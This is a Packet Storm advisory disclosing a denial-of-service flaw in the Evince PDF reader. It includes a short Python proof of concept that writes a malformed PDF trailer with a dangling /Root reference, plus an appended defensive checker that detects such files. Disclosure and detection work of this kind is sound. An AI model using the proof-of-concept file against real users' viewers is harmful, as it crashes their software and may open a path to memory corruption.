Evince PDF Reader 2.32.0.145 / 3.4.0 Denial Of Service

2013-10-03T00:00:00
ID PACKETSTORM:123505
Type packetstorm
Reporter Deva
Modified 2013-10-03T00:00:00

Description

                                        
Advisory Information :
======================  
Title : Evince 2.32.0.145 - Denial Of Service  
Product : Evince PDF reader
Vendor Homepage: https://projects.gnome.org/evince/
Vulnerable Version(s) : Windows 2.32.0.145, Linux 3.4.0 and probably prior releases
Tested Version : Windows 2.32.0.145, Linux 3.4.0  
Tested On : Windows 7 & 8, Ubuntu 13.04  
Discovered By : Deva, Securimag Team  
  
Introduction :  
==============  
Evince is a document viewer for multiple document formats.  
The goal of evince is to replace the multiple document viewers that exist on the GNOME Desktop with a single simple application.  
  
- Copied from : https://projects.gnome.org/evince/  
  
Proof Of Concept :  
==================  
You can control the dereferenced address by changing the value of /Root (here 42).
  
#!/usr/bin/python  
  
pdf = """trailer  
<<  
/Size 1337  
/Root 42 0 R  
>>  
startxref  
1  
%%EOF  
"""  
  
filename = "EvincePoC.pdf"
# Write the malformed trailer to disk as the test file
with open(filename, "w") as f:
    f.write(pdf)
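A defender-side pre-check for the malformed structure the proof of concept relies on, as an added example that is not part of the original advisory or of Evince: it flags a trailer whose /Root reference has no matching object and a startxref offset that does not point at a cross-reference section. The function names and the well-formed sample are constructed for illustration, and the check assumes uncompressed objects (a catalog stored in an object stream would be reported as missing).

```python
import re

# Constructed sample: the bytes the advisory's proof of concept writes to disk.
POC = b"trailer\n<<\n/Size 1337\n/Root 42 0 R\n>>\nstartxref\n1\n%%EOF\n"

ROOT_RE = re.compile(rb"/Root\s+(\d+)\s+(\d+)\s+R")
STARTXREF_RE = re.compile(rb"startxref\s+(\d+)\s+%%EOF")


def build_ok():
    """Constructed sample: minimal file whose trailer is self-consistent."""
    body = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    xref = b"xref\n0 2\n0000000000 65535 f \n0000000009 00000 n \n"
    tail = b"trailer\n<< /Size 2 /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % len(body)
    return body + xref + tail


def check_trailer(data):
    """Return a list of findings; an empty list means these checks passed."""
    findings = []
    if b"%PDF-" not in data[:1024]:
        findings.append("missing %PDF- header")
    roots = ROOT_RE.findall(data)
    if not roots:
        findings.append("no /Root reference")
    else:
        num, gen = roots[-1]  # the last trailer wins after incremental updates
        obj_re = re.compile(rb"(?<!\d)" + num + rb"\s+" + gen + rb"\s+obj\b")
        if not obj_re.search(data):
            findings.append("/Root %d %d R has no matching object"
                            % (int(num), int(gen)))
    offsets = STARTXREF_RE.findall(data)
    if not offsets:
        findings.append("no startxref footer")
    else:
        off = int(offsets[-1])
        target = data[off:off + 32]
        # Accept a classic "xref" table or an "N G obj" xref stream object.
        if not re.match(rb"xref|\d+\s+\d+\s+obj", target):
            findings.append("startxref offset %d does not point at an xref section" % off)
    return findings


if __name__ == "__main__":
    for name, data in (("PoC", POC), ("well-formed", build_ok())):
        print(name, check_trailer(data) or "ok")
```

A non-empty result is a reason to quarantine the file before it reaches a viewer; it is a structural sanity check, not a full PDF parser.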